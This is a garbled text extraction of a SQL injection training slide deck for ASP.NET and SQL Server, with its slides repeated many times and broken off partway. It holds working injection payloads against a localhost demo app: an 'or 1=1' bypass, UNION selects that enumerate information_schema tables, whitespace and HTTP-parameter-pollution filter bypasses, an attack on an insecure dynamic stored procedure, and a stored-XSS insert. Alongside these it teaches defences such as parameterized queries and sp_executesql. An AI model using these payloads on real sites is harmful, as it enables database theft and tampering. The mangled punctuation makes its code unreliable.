bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720or2013D12D2D ndash Translates to ldquobikersquo or 1=1--rdquo
bull The way we did the Slightly Less Naiumlve Stop actually helps us here by preventing some querystring attacks httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720union20select20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D ndash That ldquoselect20rdquo is equivalent to ldquoselect ldquo
Querystring Injection
bull Injecting other whitespace characters is as easy as 09hellipor 0Ahellip
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select09table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
HTTP Parameter Pollution
bull In ASPNET including a parameter multiple times causes the different entries to be concatenated and separated by commas
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=36ampsearch=jumpampsearch=street ndash Turns into ldquo36jumpstreetrdquo in our search
bull This can be used for evil ndash Any guesses how
HTTP Parameter Pollution
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select2F2Aampsearch=2A2F20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
ndash 2F2A =
ndash Translates to ldquoselect table_schemahelliprdquo
HTTP Parameter Pollution
bull HTTP Parameter Pollution is something most people donrsquot even think about ndash It doesnrsquot help that different platforms react in different
waysmdashconcatenate ignore all but the last etc
Effects On Different Platforms
httpswwwowasporgimagesbbaAppsecEU09_CarettoniDiPaola_v08pdf
Doing It Right Parameterized Queries
bull The right way to do it
ndash All parameters created using SqlParamter
ndash Not necessary to use stored procedures though in SQL Server this is preferable
bull Stored Procedure-Driven Test not susceptible to SQL injection You are safe from this issue
bull Secure Query-Driven Test not susceptible either
Adding Dynamic SQL Into The Mix
bull Basic insecure dynamic SP bull create procedure BadProc
Filter nvarchar(500)
as
declare sql varchar(250)
set sql = lsquoselect from table where
Name like lsquorsquorsquo + Filter + lsquorsquorsquorsquo
exec(sql)
bull The basic problem is the same as in the query-driven injection example that Filter is not sanitized or parameterized
Attacking Insecure Dynamic SPs
bull Easy to perform attacks on unprotected dynamic stored procedures from SSMS
bull exec BadProc Filter=SHOOOO
UNION select TABLE_SCHEMA +
+ TABLE_NAME 1 1 from
INFORMATION_SCHEMATABLES--
bull Parameterized queries prevent this from being an issue in ASPNET
Protecting Your Dynamic SPs
bull Use sp_executesql ndash Could also use a combo of QUOTENAME and REPLACE
bull Include the parameter as a parameter inside the sql to run
bull Example declare sql nvarchar(max) set sql = select ProductSubcategory
ID ProductCategoryID
Name from ProductionProductSubcatego
ry where Name like Filter
exec sp_executesql sql NFilter
varchar(200) Filter
bull Once you do this you are completely safe from SQL injection
Recap What To Do
bull Parameterize Your Queries ndash Use SqlParameter to handle input in ASPNet ndash Use sp_executesql correctly when you do use dynamic SQL
bull Understand your data domain ndash Correct data sizes (not too large) ndash Input field has correct length ndash Regular expressions for well-defined field types (eg phone number
Social Security Number) bull Blacklists usually donrsquot work but whitelists can
bull Create limited-access accounts for web applications bull Constraints in UI business objects and database
ndash Defense in depth ndash This isnrsquot really a violation of DRY ndash If I can beat two of your three checks the third could still stop me
Next Steps
bull Automation
ndash Havij (most popular easy GUI)
ndash Sqlmap (my favorite)
ndash BSQL Hacker (blind SQL injection)
ndash BBQSQL (Python-based blind SQL injection)
ndash Fast-Track (Metasploit module)
ndash Plenty more where this came from
bull Really evil stuff
QampA
Kevin Feasel feaselklgmailcom
Other Fun Stuff We Can Do
bull select CAST(insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 lta href=httpwwwgooglecomgtHacker Domainltagt newid() current_timestamp) as varbinary(8000)) ndash Add in undesired links Hint from Heloise this
looks suspiciously like the beginning of a cross-site scripting attack
Other Fun Stuff We Can Do
select CAST(insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 ltscript type=textjavascriptgtalert(A)ltscriptgt newid() current_timestamp) as varbinary(8000))
Querystring Injection
bull Helpful table to understand querystring injection
Hex Code Character
09 Tab
20 Space
25
27 lsquo
2B +
2C
2D -
2E
3D =
Querystring Injection
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720or2013D12D2D ndash Translates to ldquobikersquo or 1=1--rdquo
bull The way we did the Slightly Less Naiumlve Stop actually helps us here by preventing some querystring attacks httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720union20select20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D ndash That ldquoselect20rdquo is equivalent to ldquoselect ldquo
Querystring Injection
bull Injecting other whitespace characters is as easy as 09hellipor 0Ahellip
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select09table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
HTTP Parameter Pollution
bull In ASPNET including a parameter multiple times causes the different entries to be concatenated and separated by commas
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=36ampsearch=jumpampsearch=street ndash Turns into ldquo36jumpstreetrdquo in our search
bull This can be used for evil ndash Any guesses how
HTTP Parameter Pollution
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select2F2Aampsearch=2A2F20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
ndash 2F2A =
ndash Translates to ldquoselect table_schemahelliprdquo
HTTP Parameter Pollution
bull HTTP Parameter Pollution is something most people donrsquot even think about ndash It doesnrsquot help that different platforms react in different
waysmdashconcatenate ignore all but the last etc
Effects On Different Platforms
httpswwwowasporgimagesbbaAppsecEU09_CarettoniDiPaola_v08pdf
Doing It Right Parameterized Queries
bull The right way to do it
ndash All parameters created using SqlParamter
ndash Not necessary to use stored procedures though in SQL Server this is preferable
bull Stored Procedure-Driven Test not susceptible to SQL injection You are safe from this issue
bull Secure Query-Driven Test not susceptible either
Adding Dynamic SQL Into The Mix
bull Basic insecure dynamic SP bull create procedure BadProc
Filter nvarchar(500)
as
declare sql varchar(250)
set sql = lsquoselect from table where
Name like lsquorsquorsquo + Filter + lsquorsquorsquorsquo
exec(sql)
bull The basic problem is the same as in the query-driven injection example that Filter is not sanitized or parameterized
Attacking Insecure Dynamic SPs
bull Easy to perform attacks on unprotected dynamic stored procedures from SSMS
bull exec BadProc Filter=SHOOOO
UNION select TABLE_SCHEMA +
+ TABLE_NAME 1 1 from
INFORMATION_SCHEMATABLES--
bull Parameterized queries prevent this from being an issue in ASPNET
Protecting Your Dynamic SPs
bull Use sp_executesql ndash Could also use a combo of QUOTENAME and REPLACE
bull Include the parameter as a parameter inside the sql to run
bull Example declare sql nvarchar(max) set sql = select ProductSubcategory
ID ProductCategoryID
Name from ProductionProductSubcatego
ry where Name like Filter
exec sp_executesql sql NFilter
varchar(200) Filter
bull Once you do this you are completely safe from SQL injection
Recap What To Do
bull Parameterize Your Queries ndash Use SqlParameter to handle input in ASPNet ndash Use sp_executesql correctly when you do use dynamic SQL
bull Understand your data domain ndash Correct data sizes (not too large) ndash Input field has correct length ndash Regular expressions for well-defined field types (eg phone number
Social Security Number) bull Blacklists usually donrsquot work but whitelists can
bull Create limited-access accounts for web applications bull Constraints in UI business objects and database
ndash Defense in depth ndash This isnrsquot really a violation of DRY ndash If I can beat two of your three checks the third could still stop me
Next Steps
bull Automation
ndash Havij (most popular easy GUI)
ndash Sqlmap (my favorite)
ndash BSQL Hacker (blind SQL injection)
ndash BBQSQL (Python-based blind SQL injection)
ndash Fast-Track (Metasploit module)
ndash Plenty more where this came from
bull Really evil stuff
QampA
Kevin Feasel feaselklgmailcom
Other Fun Stuff We Can Do
select CAST(insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 ltscript type=textjavascriptgtalert(A)ltscriptgt newid() current_timestamp) as varbinary(8000))
Querystring Injection
bull Helpful table to understand querystring injection
Hex Code Character
09 Tab
20 Space
25
27 lsquo
2B +
2C
2D -
2E
3D =
Querystring Injection
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720or2013D12D2D ndash Translates to ldquobikersquo or 1=1--rdquo
bull The way we did the Slightly Less Naiumlve Stop actually helps us here by preventing some querystring attacks httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720union20select20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D ndash That ldquoselect20rdquo is equivalent to ldquoselect ldquo
Querystring Injection
bull Injecting other whitespace characters is as easy as 09hellipor 0Ahellip
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select09table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
HTTP Parameter Pollution
bull In ASPNET including a parameter multiple times causes the different entries to be concatenated and separated by commas
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=36ampsearch=jumpampsearch=street ndash Turns into ldquo36jumpstreetrdquo in our search
bull This can be used for evil ndash Any guesses how
HTTP Parameter Pollution
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select2F2Aampsearch=2A2F20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
ndash 2F2A =
ndash Translates to ldquoselect table_schemahelliprdquo
HTTP Parameter Pollution
bull HTTP Parameter Pollution is something most people donrsquot even think about ndash It doesnrsquot help that different platforms react in different
waysmdashconcatenate ignore all but the last etc
Effects On Different Platforms
httpswwwowasporgimagesbbaAppsecEU09_CarettoniDiPaola_v08pdf
Doing It Right Parameterized Queries
bull The right way to do it
ndash All parameters created using SqlParamter
ndash Not necessary to use stored procedures though in SQL Server this is preferable
bull Stored Procedure-Driven Test not susceptible to SQL injection You are safe from this issue
bull Secure Query-Driven Test not susceptible either
Adding Dynamic SQL Into The Mix
bull Basic insecure dynamic SP bull create procedure BadProc
Filter nvarchar(500)
as
declare sql varchar(250)
set sql = lsquoselect from table where
Name like lsquorsquorsquo + Filter + lsquorsquorsquorsquo
exec(sql)
bull The basic problem is the same as in the query-driven injection example that Filter is not sanitized or parameterized
Attacking Insecure Dynamic SPs
bull Easy to perform attacks on unprotected dynamic stored procedures from SSMS
bull exec BadProc Filter=SHOOOO
UNION select TABLE_SCHEMA +
+ TABLE_NAME 1 1 from
INFORMATION_SCHEMATABLES--
bull Parameterized queries prevent this from being an issue in ASPNET
Protecting Your Dynamic SPs
bull Use sp_executesql ndash Could also use a combo of QUOTENAME and REPLACE
bull Include the parameter as a parameter inside the sql to run
bull Example declare sql nvarchar(max) set sql = select ProductSubcategory
ID ProductCategoryID
Name from ProductionProductSubcatego
ry where Name like Filter
exec sp_executesql sql NFilter
varchar(200) Filter
bull Once you do this you are completely safe from SQL injection
Recap What To Do
bull Parameterize Your Queries ndash Use SqlParameter to handle input in ASPNet ndash Use sp_executesql correctly when you do use dynamic SQL
bull Understand your data domain ndash Correct data sizes (not too large) ndash Input field has correct length ndash Regular expressions for well-defined field types (eg phone number
Social Security Number) bull Blacklists usually donrsquot work but whitelists can
bull Create limited-access accounts for web applications bull Constraints in UI business objects and database
ndash Defense in depth ndash This isnrsquot really a violation of DRY ndash If I can beat two of your three checks the third could still stop me
Next Steps
bull Automation
ndash Havij (most popular easy GUI)
ndash Sqlmap (my favorite)
ndash BSQL Hacker (blind SQL injection)
ndash BBQSQL (Python-based blind SQL injection)
ndash Fast-Track (Metasploit module)
ndash Plenty more where this came from
bull Really evil stuff
QampA
Kevin Feasel feaselklgmailcom
Querystring Injection
bull Helpful table to understand querystring injection
Hex Code Character
09 Tab
20 Space
25
27 lsquo
2B +
2C
2D -
2E
3D =
Querystring Injection
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720or2013D12D2D ndash Translates to ldquobikersquo or 1=1--rdquo
bull The way we did the Slightly Less Naiumlve Stop actually helps us here by preventing some querystring attacks httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720union20select20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D ndash That ldquoselect20rdquo is equivalent to ldquoselect ldquo
Querystring Injection
bull Injecting other whitespace characters is as easy as 09hellipor 0Ahellip
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select09table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
HTTP Parameter Pollution
bull In ASPNET including a parameter multiple times causes the different entries to be concatenated and separated by commas
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=36ampsearch=jumpampsearch=street ndash Turns into ldquo36jumpstreetrdquo in our search
bull This can be used for evil ndash Any guesses how
HTTP Parameter Pollution
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select2F2Aampsearch=2A2F20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
ndash 2F2A =
ndash Translates to ldquoselect table_schemahelliprdquo
HTTP Parameter Pollution
bull HTTP Parameter Pollution is something most people donrsquot even think about ndash It doesnrsquot help that different platforms react in different
waysmdashconcatenate ignore all but the last etc
Effects On Different Platforms
httpswwwowasporgimagesbbaAppsecEU09_CarettoniDiPaola_v08pdf
Doing It Right Parameterized Queries
bull The right way to do it
ndash All parameters created using SqlParamter
ndash Not necessary to use stored procedures though in SQL Server this is preferable
bull Stored Procedure-Driven Test not susceptible to SQL injection You are safe from this issue
bull Secure Query-Driven Test not susceptible either
Adding Dynamic SQL Into The Mix
bull Basic insecure dynamic SP bull create procedure BadProc
Filter nvarchar(500)
as
declare sql varchar(250)
set sql = lsquoselect from table where
Name like lsquorsquorsquo + Filter + lsquorsquorsquorsquo
exec(sql)
bull The basic problem is the same as in the query-driven injection example that Filter is not sanitized or parameterized
Attacking Insecure Dynamic SPs
bull Easy to perform attacks on unprotected dynamic stored procedures from SSMS
bull exec BadProc Filter=SHOOOO
UNION select TABLE_SCHEMA +
+ TABLE_NAME 1 1 from
INFORMATION_SCHEMATABLES--
bull Parameterized queries prevent this from being an issue in ASPNET
Protecting Your Dynamic SPs
bull Use sp_executesql ndash Could also use a combo of QUOTENAME and REPLACE
bull Include the parameter as a parameter inside the sql to run
bull Example declare sql nvarchar(max) set sql = select ProductSubcategory
ID ProductCategoryID
Name from ProductionProductSubcatego
ry where Name like Filter
exec sp_executesql sql NFilter
varchar(200) Filter
bull Once you do this you are completely safe from SQL injection
Recap What To Do
bull Parameterize Your Queries ndash Use SqlParameter to handle input in ASPNet ndash Use sp_executesql correctly when you do use dynamic SQL
bull Understand your data domain ndash Correct data sizes (not too large) ndash Input field has correct length ndash Regular expressions for well-defined field types (eg phone number
Social Security Number) bull Blacklists usually donrsquot work but whitelists can
bull Create limited-access accounts for web applications bull Constraints in UI business objects and database
ndash Defense in depth ndash This isnrsquot really a violation of DRY ndash If I can beat two of your three checks the third could still stop me
Next Steps
bull Automation
ndash Havij (most popular easy GUI)
ndash Sqlmap (my favorite)
ndash BSQL Hacker (blind SQL injection)
ndash BBQSQL (Python-based blind SQL injection)
ndash Fast-Track (Metasploit module)
ndash Plenty more where this came from
bull Really evil stuff
QampA
Kevin Feasel feaselklgmailcom
Querystring Injection
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720or2013D12D2D ndash Translates to ldquobikersquo or 1=1--rdquo
bull The way we did the Slightly Less Naiumlve Stop actually helps us here by preventing some querystring attacks httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720union20select20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D ndash That ldquoselect20rdquo is equivalent to ldquoselect ldquo
Querystring Injection
bull Injecting other whitespace characters is as easy as 09hellipor 0Ahellip
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select09table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
HTTP Parameter Pollution
bull In ASPNET including a parameter multiple times causes the different entries to be concatenated and separated by commas
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=36ampsearch=jumpampsearch=street ndash Turns into ldquo36jumpstreetrdquo in our search
bull This can be used for evil ndash Any guesses how
HTTP Parameter Pollution
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select2F2Aampsearch=2A2F20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
ndash 2F2A =
ndash Translates to ldquoselect table_schemahelliprdquo
HTTP Parameter Pollution
bull HTTP Parameter Pollution is something most people donrsquot even think about ndash It doesnrsquot help that different platforms react in different
waysmdashconcatenate ignore all but the last etc
Effects On Different Platforms
httpswwwowasporgimagesbbaAppsecEU09_CarettoniDiPaola_v08pdf
Doing It Right Parameterized Queries
bull The right way to do it
ndash All parameters created using SqlParamter
ndash Not necessary to use stored procedures though in SQL Server this is preferable
bull Stored Procedure-Driven Test not susceptible to SQL injection You are safe from this issue
bull Secure Query-Driven Test not susceptible either
Adding Dynamic SQL Into The Mix
bull Basic insecure dynamic SP bull create procedure BadProc
Filter nvarchar(500)
as
declare sql varchar(250)
set sql = lsquoselect from table where
Name like lsquorsquorsquo + Filter + lsquorsquorsquorsquo
exec(sql)
bull The basic problem is the same as in the query-driven injection example that Filter is not sanitized or parameterized
Attacking Insecure Dynamic SPs
bull Easy to perform attacks on unprotected dynamic stored procedures from SSMS
bull exec BadProc Filter=SHOOOO
UNION select TABLE_SCHEMA +
+ TABLE_NAME 1 1 from
INFORMATION_SCHEMATABLES--
bull Parameterized queries prevent this from being an issue in ASPNET
Protecting Your Dynamic SPs
bull Use sp_executesql ndash Could also use a combo of QUOTENAME and REPLACE
bull Include the parameter as a parameter inside the sql to run
bull Example declare sql nvarchar(max) set sql = select ProductSubcategory
ID ProductCategoryID
Name from ProductionProductSubcatego
ry where Name like Filter
exec sp_executesql sql NFilter
varchar(200) Filter
bull Once you do this you are completely safe from SQL injection
Recap What To Do
bull Parameterize Your Queries ndash Use SqlParameter to handle input in ASPNet ndash Use sp_executesql correctly when you do use dynamic SQL
bull Understand your data domain ndash Correct data sizes (not too large) ndash Input field has correct length ndash Regular expressions for well-defined field types (eg phone number
Social Security Number) bull Blacklists usually donrsquot work but whitelists can
bull Create limited-access accounts for web applications bull Constraints in UI business objects and database
ndash Defense in depth ndash This isnrsquot really a violation of DRY ndash If I can beat two of your three checks the third could still stop me
Next Steps
bull Automation
ndash Havij (most popular easy GUI)
ndash Sqlmap (my favorite)
ndash BSQL Hacker (blind SQL injection)
ndash BBQSQL (Python-based blind SQL injection)
ndash Fast-Track (Metasploit module)
ndash Plenty more where this came from
bull Really evil stuff
QampA
Kevin Feasel feaselklgmailcom
Querystring Injection
bull Injecting other whitespace characters is as easy as 09hellipor 0Ahellip
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select09table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
HTTP Parameter Pollution
bull In ASPNET including a parameter multiple times causes the different entries to be concatenated and separated by commas
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=36ampsearch=jumpampsearch=street ndash Turns into ldquo36jumpstreetrdquo in our search
bull This can be used for evil ndash Any guesses how
HTTP Parameter Pollution
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select2F2Aampsearch=2A2F20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
ndash 2F2A =
ndash Translates to ldquoselect table_schemahelliprdquo
HTTP Parameter Pollution
bull HTTP Parameter Pollution is something most people donrsquot even think about ndash It doesnrsquot help that different platforms react in different
waysmdashconcatenate ignore all but the last etc
Effects On Different Platforms
httpswwwowasporgimagesbbaAppsecEU09_CarettoniDiPaola_v08pdf
Doing It Right Parameterized Queries
bull The right way to do it
ndash All parameters created using SqlParamter
ndash Not necessary to use stored procedures though in SQL Server this is preferable
bull Stored Procedure-Driven Test not susceptible to SQL injection You are safe from this issue
bull Secure Query-Driven Test not susceptible either
Adding Dynamic SQL Into The Mix
bull Basic insecure dynamic SP bull create procedure BadProc
Filter nvarchar(500)
as
declare sql varchar(250)
set sql = lsquoselect from table where
Name like lsquorsquorsquo + Filter + lsquorsquorsquorsquo
exec(sql)
bull The basic problem is the same as in the query-driven injection example that Filter is not sanitized or parameterized
Attacking Insecure Dynamic SPs
bull Easy to perform attacks on unprotected dynamic stored procedures from SSMS
bull exec BadProc Filter=SHOOOO
UNION select TABLE_SCHEMA +
+ TABLE_NAME 1 1 from
INFORMATION_SCHEMATABLES--
bull Parameterized queries prevent this from being an issue in ASPNET
Protecting Your Dynamic SPs
bull Use sp_executesql ndash Could also use a combo of QUOTENAME and REPLACE
bull Include the parameter as a parameter inside the sql to run
bull Example declare sql nvarchar(max) set sql = select ProductSubcategory
ID ProductCategoryID
Name from ProductionProductSubcatego
ry where Name like Filter
exec sp_executesql sql NFilter
varchar(200) Filter
bull Once you do this you are completely safe from SQL injection
Recap What To Do
bull Parameterize Your Queries ndash Use SqlParameter to handle input in ASPNet ndash Use sp_executesql correctly when you do use dynamic SQL
bull Understand your data domain ndash Correct data sizes (not too large) ndash Input field has correct length ndash Regular expressions for well-defined field types (eg phone number
Social Security Number) bull Blacklists usually donrsquot work but whitelists can
bull Create limited-access accounts for web applications bull Constraints in UI business objects and database
ndash Defense in depth ndash This isnrsquot really a violation of DRY ndash If I can beat two of your three checks the third could still stop me
Next Steps
bull Automation
ndash Havij (most popular easy GUI)
ndash Sqlmap (my favorite)
ndash BSQL Hacker (blind SQL injection)
ndash BBQSQL (Python-based blind SQL injection)
ndash Fast-Track (Metasploit module)
ndash Plenty more where this came from
bull Really evil stuff
QampA
Kevin Feasel feaselklgmailcom
HTTP Parameter Pollution
bull In ASPNET including a parameter multiple times causes the different entries to be concatenated and separated by commas
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=36ampsearch=jumpampsearch=street ndash Turns into ldquo36jumpstreetrdquo in our search
bull This can be used for evil ndash Any guesses how
HTTP Parameter Pollution
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select2F2Aampsearch=2A2F20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
ndash 2F2A =
ndash Translates to ldquoselect table_schemahelliprdquo
HTTP Parameter Pollution
bull HTTP Parameter Pollution is something most people donrsquot even think about ndash It doesnrsquot help that different platforms react in different
waysmdashconcatenate ignore all but the last etc
Effects On Different Platforms
httpswwwowasporgimagesbbaAppsecEU09_CarettoniDiPaola_v08pdf
Doing It Right Parameterized Queries
bull The right way to do it
ndash All parameters created using SqlParamter
ndash Not necessary to use stored procedures though in SQL Server this is preferable
bull Stored Procedure-Driven Test not susceptible to SQL injection You are safe from this issue
bull Secure Query-Driven Test not susceptible either
Adding Dynamic SQL Into The Mix
bull Basic insecure dynamic SP bull create procedure BadProc
Filter nvarchar(500)
as
declare sql varchar(250)
set sql = lsquoselect from table where
Name like lsquorsquorsquo + Filter + lsquorsquorsquorsquo
exec(sql)
bull The basic problem is the same as in the query-driven injection example that Filter is not sanitized or parameterized
Attacking Insecure Dynamic SPs
bull Easy to perform attacks on unprotected dynamic stored procedures from SSMS
bull exec BadProc Filter=SHOOOO
UNION select TABLE_SCHEMA +
+ TABLE_NAME 1 1 from
INFORMATION_SCHEMATABLES--
bull Parameterized queries prevent this from being an issue in ASPNET
Protecting Your Dynamic SPs
bull Use sp_executesql ndash Could also use a combo of QUOTENAME and REPLACE
bull Include the parameter as a parameter inside the sql to run
bull Example declare sql nvarchar(max) set sql = select ProductSubcategory
ID ProductCategoryID
Name from ProductionProductSubcatego
ry where Name like Filter
exec sp_executesql sql NFilter
varchar(200) Filter
bull Once you do this you are completely safe from SQL injection
Recap What To Do
bull Parameterize Your Queries ndash Use SqlParameter to handle input in ASPNet ndash Use sp_executesql correctly when you do use dynamic SQL
bull Understand your data domain ndash Correct data sizes (not too large) ndash Input field has correct length ndash Regular expressions for well-defined field types (eg phone number
Social Security Number) bull Blacklists usually donrsquot work but whitelists can
bull Create limited-access accounts for web applications bull Constraints in UI business objects and database
ndash Defense in depth ndash This isnrsquot really a violation of DRY ndash If I can beat two of your three checks the third could still stop me
Next Steps
bull Automation
ndash Havij (most popular easy GUI)
ndash Sqlmap (my favorite)
ndash BSQL Hacker (blind SQL injection)
ndash BBQSQL (Python-based blind SQL injection)
ndash Fast-Track (Metasploit module)
ndash Plenty more where this came from
bull Really evil stuff
QampA
Kevin Feasel feaselklgmailcom
HTTP Parameter Pollution
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select2F2Aampsearch=2A2F20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
ndash 2F2A =
ndash Translates to ldquoselect table_schemahelliprdquo
HTTP Parameter Pollution
bull HTTP Parameter Pollution is something most people donrsquot even think about ndash It doesnrsquot help that different platforms react in different
waysmdashconcatenate ignore all but the last etc
Effects On Different Platforms
httpswwwowasporgimagesbbaAppsecEU09_CarettoniDiPaola_v08pdf
Doing It Right Parameterized Queries
bull The right way to do it
ndash All parameters created using SqlParamter
ndash Not necessary to use stored procedures though in SQL Server this is preferable
bull Stored Procedure-Driven Test not susceptible to SQL injection You are safe from this issue
bull Secure Query-Driven Test not susceptible either
Adding Dynamic SQL Into The Mix
bull Basic insecure dynamic SP bull create procedure BadProc
Filter nvarchar(500)
as
declare sql varchar(250)
set sql = lsquoselect from table where
Name like lsquorsquorsquo + Filter + lsquorsquorsquorsquo
exec(sql)
bull The basic problem is the same as in the query-driven injection example that Filter is not sanitized or parameterized
Attacking Insecure Dynamic SPs
bull Easy to perform attacks on unprotected dynamic stored procedures from SSMS
bull exec BadProc Filter=SHOOOO
UNION select TABLE_SCHEMA +
+ TABLE_NAME 1 1 from
INFORMATION_SCHEMATABLES--
bull Parameterized queries prevent this from being an issue in ASPNET
Protecting Your Dynamic SPs
bull Use sp_executesql ndash Could also use a combo of QUOTENAME and REPLACE
bull Include the parameter as a parameter inside the sql to run
bull Example declare sql nvarchar(max) set sql = select ProductSubcategory
ID ProductCategoryID
Name from ProductionProductSubcatego
ry where Name like Filter
exec sp_executesql sql NFilter
varchar(200) Filter
bull Once you do this you are completely safe from SQL injection
Recap What To Do
bull Parameterize Your Queries ndash Use SqlParameter to handle input in ASPNet ndash Use sp_executesql correctly when you do use dynamic SQL
bull Understand your data domain ndash Correct data sizes (not too large) ndash Input field has correct length ndash Regular expressions for well-defined field types (eg phone number
Social Security Number) bull Blacklists usually donrsquot work but whitelists can
bull Create limited-access accounts for web applications bull Constraints in UI business objects and database
ndash Defense in depth ndash This isnrsquot really a violation of DRY ndash If I can beat two of your three checks the third could still stop me
Next Steps
bull Automation
ndash Havij (most popular easy GUI)
ndash Sqlmap (my favorite)
ndash BSQL Hacker (blind SQL injection)
ndash BBQSQL (Python-based blind SQL injection)
ndash Fast-Track (Metasploit module)
ndash Plenty more where this came from
bull Really evil stuff
QampA
Kevin Feasel feaselklgmailcom
HTTP Parameter Pollution
bull HTTP Parameter Pollution is something most people donrsquot even think about ndash It doesnrsquot help that different platforms react in different
waysmdashconcatenate ignore all but the last etc
Effects On Different Platforms
httpswwwowasporgimagesbbaAppsecEU09_CarettoniDiPaola_v08pdf
Doing It Right Parameterized Queries
bull The right way to do it
ndash All parameters created using SqlParamter
ndash Not necessary to use stored procedures though in SQL Server this is preferable
bull Stored Procedure-Driven Test not susceptible to SQL injection You are safe from this issue
bull Secure Query-Driven Test not susceptible either
Adding Dynamic SQL Into The Mix
bull Basic insecure dynamic SP bull create procedure BadProc
Filter nvarchar(500)
as
declare sql varchar(250)
set sql = lsquoselect from table where
Name like lsquorsquorsquo + Filter + lsquorsquorsquorsquo
exec(sql)
bull The basic problem is the same as in the query-driven injection example that Filter is not sanitized or parameterized
Attacking Insecure Dynamic SPs
bull Easy to perform attacks on unprotected dynamic stored procedures from SSMS
bull exec BadProc Filter=SHOOOO
UNION select TABLE_SCHEMA +
+ TABLE_NAME 1 1 from
INFORMATION_SCHEMATABLES--
bull Parameterized queries prevent this from being an issue in ASPNET
Protecting Your Dynamic SPs
bull Use sp_executesql ndash Could also use a combo of QUOTENAME and REPLACE
bull Include the parameter as a parameter inside the sql to run
bull Example declare sql nvarchar(max) set sql = select ProductSubcategory
ID ProductCategoryID
Name from ProductionProductSubcatego
ry where Name like Filter
exec sp_executesql sql NFilter
varchar(200) Filter
bull Once you do this you are completely safe from SQL injection
Recap What To Do
bull Parameterize Your Queries ndash Use SqlParameter to handle input in ASPNet ndash Use sp_executesql correctly when you do use dynamic SQL
bull Understand your data domain ndash Correct data sizes (not too large) ndash Input field has correct length ndash Regular expressions for well-defined field types (eg phone number
Social Security Number) bull Blacklists usually donrsquot work but whitelists can
bull Create limited-access accounts for web applications bull Constraints in UI business objects and database
ndash Defense in depth ndash This isnrsquot really a violation of DRY ndash If I can beat two of your three checks the third could still stop me
Next Steps
bull Automation
ndash Havij (most popular easy GUI)
ndash Sqlmap (my favorite)
ndash BSQL Hacker (blind SQL injection)
ndash BBQSQL (Python-based blind SQL injection)
ndash Fast-Track (Metasploit module)
ndash Plenty more where this came from
bull Really evil stuff
QampA
Kevin Feasel feaselklgmailcom
Effects On Different Platforms
httpswwwowasporgimagesbbaAppsecEU09_CarettoniDiPaola_v08pdf
Doing It Right Parameterized Queries
bull The right way to do it
ndash All parameters created using SqlParamter
ndash Not necessary to use stored procedures though in SQL Server this is preferable
bull Stored Procedure-Driven Test not susceptible to SQL injection You are safe from this issue
bull Secure Query-Driven Test not susceptible either
Adding Dynamic SQL Into The Mix
bull Basic insecure dynamic SP bull create procedure BadProc
Filter nvarchar(500)
as
declare sql varchar(250)
set sql = lsquoselect from table where
